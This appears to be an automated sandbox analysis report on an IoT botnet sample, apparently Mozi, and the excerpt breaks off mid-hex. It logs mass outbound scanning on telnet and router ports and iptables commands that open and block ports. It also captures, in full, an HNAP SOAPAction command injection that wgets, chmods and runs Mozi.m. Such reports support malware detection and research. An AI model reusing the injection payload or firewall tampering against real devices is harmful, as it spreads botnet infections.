Source: global traffic TCP traffic: 192.168.2.20:38966 -> 93.125.79.29:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 12.217.1.33:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 34.175.42.70:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 178.143.250.24:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 70.222.43.28:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 179.59.114.218:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 180.224.65.62:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 102.94.171.34:2323
Source: global traffic TCP traffic: 192.168.2.20:53230 -> 188.98.239.62:8080
Source: global traffic TCP traffic: 192.168.2.20:38504 -> 9.100.19.116:37215
Source: global traffic TCP traffic: 192.168.2.20:51976 -> 55.81.183.13:7574
Source: global traffic TCP traffic: 192.168.2.20:40800 -> 41.15.105.103:81
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 46.53.122.52:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 128.2.202.163:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 191.255.172.135:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 156.115.2.35:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 151.208.44.78:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 221.38.132.116:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 60.92.23.230:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 9.121.228.46:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 157.36.120.230:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 217.134.229.221:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 75.177.226.1:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 222.193.130.85:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 152.249.246.144:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 65.220.27.102:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 205.136.140.70:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 177.202.164.81:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 132.251.146.76:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 78.77.170.194:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 59.24.29.139:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 70.236.172.76:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 190.204.120.220:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 162.234.103.103:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 150.130.200.215:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 139.183.35.243:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 98.86.56.206:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 218.183.188.145:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 156.2.191.200:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 109.152.110.66:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 73.115.24.64:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 39.91.113.59:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 124.51.165.116:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 142.62.53.56:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 118.191.27.120:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 175.45.127.111:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 87.214.75.15:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 85.248.81.232:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 166.246.119.125:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 38.86.147.101:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 200.80.233.162:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 119.239.185.199:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 47.124.185.211:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 145.202.40.191:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 90.12.152.232:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 12.82.102.244:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 189.247.28.210:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 175.73.120.141:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 117.50.196.155:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 145.125.125.212:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 80.90.230.150:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 105.85.84.70:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 14.61.47.227:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 217.114.8.172:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 27.209.210.68:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 79.82.147.31:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 141.63.11.11:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 110.51.33.149:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 156.126.91.176:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 98.101.142.31:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 86.83.149.144:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 149.239.97.222:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 115.13.194.56:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 76.224.31.105:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 177.156.213.51:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 66.241.77.173:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 53.202.144.36:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 117.96.106.239:2323
Source: global traffic TCP traffic: 192.168.2.20:59014 -> 107.83.32.38:37215
Source: global traffic TCP traffic: 192.168.2.20:50588 -> 42.102.110.42:5555
Source: global traffic TCP traffic: 192.168.2.20:57110 -> 63.86.4.143:5555
Source: global traffic TCP traffic: 192.168.2.20:55008 -> 5.19.225.53:49152
Source: global traffic TCP traffic: 192.168.2.20:47454 -> 1.49.50.146:8080
Source: global traffic TCP traffic: 192.168.2.20:58792 -> 27.119.64.213:5555
Source: global traffic TCP traffic: 192.168.2.20:54696 -> 77.61.9.118:8080
Source: global traffic TCP traffic: 192.168.2.20:60754 -> 215.25.1.43:8080
Source: global traffic TCP traffic: 192.168.2.20:34238 -> 85.65.166.46:7574
Source: global traffic TCP traffic: 192.168.2.20:39582 -> 92.9.6.106:81
Source: global traffic TCP traffic: 192.168.2.20:51178 -> 17.200.108.90:8080
Source: global traffic TCP traffic: 192.168.2.20:43650 -> 188.125.124.130:5555
Source: global traffic TCP traffic: 192.168.2.20:59600 -> 143.186.223.47:37215
Source: global traffic TCP traffic: 192.168.2.20:41988 -> 174.61.123.4:81
Source: global traffic TCP traffic: 192.168.2.20:57856 -> 129.203.155.83:81
Source: global traffic TCP traffic: 192.168.2.20:46736 -> 199.190.84.76:8080
Source: global traffic TCP traffic: 192.168.2.20:43764 -> 129.70.201.124:52869
Source: global traffic TCP traffic: 192.168.2.20:38470 -> 34.159.208.93:8443
Source: global traffic TCP traffic: 192.168.2.20:44192 -> 5.106.254.98:49152
Source: global traffic TCP traffic: 192.168.2.20:35270 -> 153.19.67.27:8080
Source: global traffic TCP traffic: 192.168.2.20:47912 -> 119.109.91.45:5555
Source: global traffic TCP traffic: 192.168.2.20:47858 -> 9.127.16.222:52869
Source: global traffic TCP traffic: 192.168.2.20:60670 -> 187.160.72.23:5555
Source: global traffic TCP traffic: 192.168.2.20:37266 -> 167.252.75.82:81
Source: global traffic TCP traffic: 192.168.2.20:50044 -> 174.104.214.106:8080
Source: global traffic TCP traffic: 192.168.2.20:60548 -> 110.222.0.17:5555
Source: global traffic TCP traffic: 192.168.2.20:53782 -> 79.128.254.138:8080
Source: global traffic TCP traffic: 192.168.2.20:40814 -> 100.195.166.208:8080
Source: global traffic TCP traffic: 192.168.2.20:42136 -> 208.105.114.125:8080
Source: global traffic TCP traffic: 192.168.2.20:50720 -> 64.143.91.44:8080
Source: global traffic TCP traffic: 192.168.2.20:49548 -> 49.66.2.12:37215
Source: global traffic TCP traffic: 192.168.2.20:56608 -> 78.18.247.141:8080
Source: global traffic TCP traffic: 192.168.2.20:33014 -> 91.192.142.0:8080
Source: global traffic TCP traffic: 192.168.2.20:51224 -> 218.129.240.16:8080
Source: global traffic TCP traffic: 192.168.2.20:52082 -> 31.83.182.95:8080
Source: global traffic TCP traffic: 192.168.2.20:39828 -> 103.139.115.132:37215
Source: global traffic TCP traffic: 192.168.2.20:59454 -> 37.164.216.115:7574
Source: global traffic TCP traffic: 192.168.2.20:49520 -> 39.11.180.76:8080
Source: global traffic TCP traffic: 192.168.2.20:40372 -> 220.36.69.33:49152
Source: global traffic TCP traffic: 192.168.2.20:49754 -> 145.28.141.26:8080
Source: global traffic TCP traffic: 192.168.2.20:52780 -> 2.194.123.64:5555
Source: global traffic TCP traffic: 192.168.2.20:57560 -> 142.102.31.151:7574
Source: global traffic TCP traffic: 192.168.2.20:33620 -> 185.42.0.160:8080
Source: global traffic TCP traffic: 192.168.2.20:48018 -> 204.183.59.253:81
Source: global traffic TCP traffic: 192.168.2.20:53468 -> 146.186.244.99:49152
Source: global traffic TCP traffic: 192.168.2.20:60412 -> 38.133.161.16:37215
Source: global traffic TCP traffic: 192.168.2.20:60784 -> 102.121.26.169:5555
Source: global traffic TCP traffic: 192.168.2.20:38416 -> 37.29.125.175:37215
Source: global traffic TCP traffic: 192.168.2.20:33358 -> 37.251.207.177:7574
Source: global traffic TCP traffic: 192.168.2.20:58532 -> 166.62.251.181:37215
Source: global traffic TCP traffic: 192.168.2.20:44362 -> 155.235.243.131:8080
Source: global traffic TCP traffic: 192.168.2.20:57086 -> 11.183.123.93:8080
Source: global traffic TCP traffic: 192.168.2.20:55174 -> 215.207.144.3:49152
Source: global traffic TCP traffic: 192.168.2.20:48760 -> 128.178.98.38:5555
Source: global traffic TCP traffic: 192.168.2.20:54968 -> 195.234.15.147:8080
Source: global traffic TCP traffic: 192.168.2.20:39402 -> 48.78.220.237:8443
Source: global traffic TCP traffic: 192.168.2.20:55900 -> 15.34.35.162:81
Source: global traffic TCP traffic: 192.168.2.20:45648 -> 88.237.131.5:52869
Source: global traffic TCP traffic: 192.168.2.20:33386 -> 111.66.60.152:7574
Source: global traffic TCP traffic: 192.168.2.20:49664 -> 217.8.168.203:37215
Source: global traffic TCP traffic: 192.168.2.20:52430 -> 139.220.137.236:49152
Source: global traffic TCP traffic: 192.168.2.20:57944 -> 7.24.188.177:37215
Source: global traffic TCP traffic: 192.168.2.20:56768 -> 117.236.45.24:7574
Source: global traffic TCP traffic: 192.168.2.20:34768 -> 84.167.218.252:8080
Source: global traffic TCP traffic: 192.168.2.20:52792 -> 24.137.84.52:8080
Source: global traffic TCP traffic: 192.168.2.20:33732 -> 177.171.241.133:49152
Source: global traffic TCP traffic: 192.168.2.20:46042 -> 194.114.82.36:52869
Source: global traffic TCP traffic: 192.168.2.20:41616 -> 41.45.80.140:7574
Source: global traffic TCP traffic: 192.168.2.20:37616 -> 204.251.181.102:8080
Source: global traffic TCP traffic: 192.168.2.20:44400 -> 143.112.83.247:52869
Source: global traffic TCP traffic: 192.168.2.20:36766 -> 75.208.112.233:81
Source: global traffic TCP traffic: 192.168.2.20:33662 -> 200.234.37.2:8080
Source: global traffic TCP traffic: 192.168.2.20:41252 -> 112.3.168.197:52869
Source: global traffic TCP traffic: 192.168.2.20:52898 -> 27.141.18.98:49152
Source: global traffic TCP traffic: 192.168.2.20:38744 -> 91.3.51.44:8443
Source: global traffic TCP traffic: 192.168.2.20:55428 -> 47.137.7.27:8080
Source: global traffic TCP traffic: 192.168.2.20:51092 -> 166.164.230.183:49152
Source: global traffic TCP traffic: 192.168.2.20:41278 -> 34.54.225.13:7574
Source: global traffic TCP traffic: 192.168.2.20:48980 -> 24.11.89.192:5555
Source: global traffic TCP traffic: 192.168.2.20:34786 -> 14.223.97.170:8080
Source: global traffic TCP traffic: 192.168.2.20:44996 -> 103.99.243.75:49152
Source: global traffic TCP traffic: 192.168.2.20:57654 -> 51.128.81.140:52869
Source: global traffic TCP traffic: 192.168.2.20:56984 -> 86.187.216.50:8080
Source: global traffic TCP traffic: 192.168.2.20:59450 -> 44.178.68.126:52869
Source: global traffic TCP traffic: 192.168.2.20:49570 -> 99.55.126.64:49152
Source: global traffic TCP traffic: 192.168.2.20:53626 -> 212.252.189.231:52869
Source: global traffic TCP traffic: 192.168.2.20:57754 -> 67.141.150.157:7574
Source: global traffic TCP traffic: 192.168.2.20:42598 -> 82.82.13.16:7574
Source: global traffic TCP traffic: 192.168.2.20:35694 -> 59.92.7.51:8080
Source: global traffic TCP traffic: 192.168.2.20:35092 -> 47.157.4.46:8443
Source: global traffic TCP traffic: 192.168.2.20:49572 -> 188.122.128.229:8443
Source: global traffic TCP traffic: 192.168.2.20:35008 -> 87.170.128.148:8443
Source: global traffic TCP traffic: 192.168.2.20:44602 -> 72.31.225.37:49152
Source: global traffic TCP traffic: 192.168.2.20:44860 -> 152.228.90.250:8080
Source: global traffic TCP traffic: 192.168.2.20:41078 -> 209.56.207.155:5555
Source: global traffic TCP traffic: 192.168.2.20:59628 -> 111.107.152.130:81
Source: global traffic TCP traffic: 192.168.2.20:36804 -> 13.45.211.234:8443
Source: global traffic TCP traffic: 192.168.2.20:40256 -> 210.252.49.225:8080
Source: global traffic TCP traffic: 192.168.2.20:44276 -> 134.25.64.92:49152
Source: global traffic TCP traffic: 192.168.2.20:50358 -> 89.174.164.208:52869
Source: global traffic TCP traffic: 192.168.2.20:59184 -> 189.234.220.98:52869
Source: global traffic TCP traffic: 192.168.2.20:46178 -> 29.148.154.160:37215
Source: global traffic TCP traffic: 192.168.2.20:60542 -> 105.104.101.61:52869
Source: global traffic TCP traffic: 192.168.2.20:57624 -> 39.63.197.41:8080
Source: global traffic TCP traffic: 192.168.2.20:33714 -> 195.57.220.195:37215
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 185.130.70.237:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 148.236.161.228:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 170.193.219.164:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 95.127.13.97:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 145.141.224.81:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 36.38.147.114:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 38.66.22.61:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 1.24.25.210:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 104.35.176.53:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 164.22.155.213:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 112.37.18.36:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 35.232.255.30:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 159.77.14.210:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 168.153.87.219:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 174.70.15.219:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 134.248.182.114:2323
Source: global traffic TCP traffic: 192.168.2.20:47942 -> 11.204.139.149:7574
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 31.19.63.66:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 65.18.237.147:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 45.157.127.192:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 116.118.233.89:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 71.174.25.150:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 100.144.218.21:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 130.2.227.224:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 81.173.47.125:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 212.161.205.179:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 121.211.248.199:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 119.74.40.73:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 206.129.47.162:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 41.107.234.16:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 18.110.27.62:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 185.178.179.85:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 220.195.212.170:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 219.112.25.112:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 58.206.104.58:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 126.53.17.15:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 8.247.166.19:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 5.118.81.170:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 165.138.141.206:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 65.181.128.45:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 170.89.93.136:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 121.147.191.42:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 60.143.240.242:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 72.197.158.20:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 206.20.66.135:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 186.194.239.214:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 165.187.11.238:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 198.85.9.99:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 167.200.246.250:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 159.157.87.236:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 180.186.110.160:2323
Source: global traffic TCP traffic: 192.168.2.20:57578 -> 182.239.51.93:49152
Source: global traffic TCP traffic: 192.168.2.20:40412 -> 4.161.141.180:49152
Source: global traffic TCP traffic: 192.168.2.20:52528 -> 36.183.244.225:8443
Source: global traffic TCP traffic: 192.168.2.20:41794 -> 40.233.175.103:8080
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 13.73.11.39:1023
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 94.17.28.194:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 113.107.225.229:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 209.121.60.1:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 103.18.14.97:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 94.210.194.136:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 84.62.181.33:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 161.71.248.209:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 161.254.98.127:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 220.254.157.92:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 34.22.97.104:2323
Source: global traffic TCP traffic: 192.168.2.20:38966 -> 85.88.159.213:2323
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4635) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4668) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4671) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4707) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4733) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4754) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4776) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4811) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4814) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4823) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4846) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4894) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4920) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4944) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4948) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4957) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4980) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5024) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5053) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5080) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5107) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5135) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5149) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5172) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5186) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5227) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5249) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5252) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.132.44.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.58.36.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 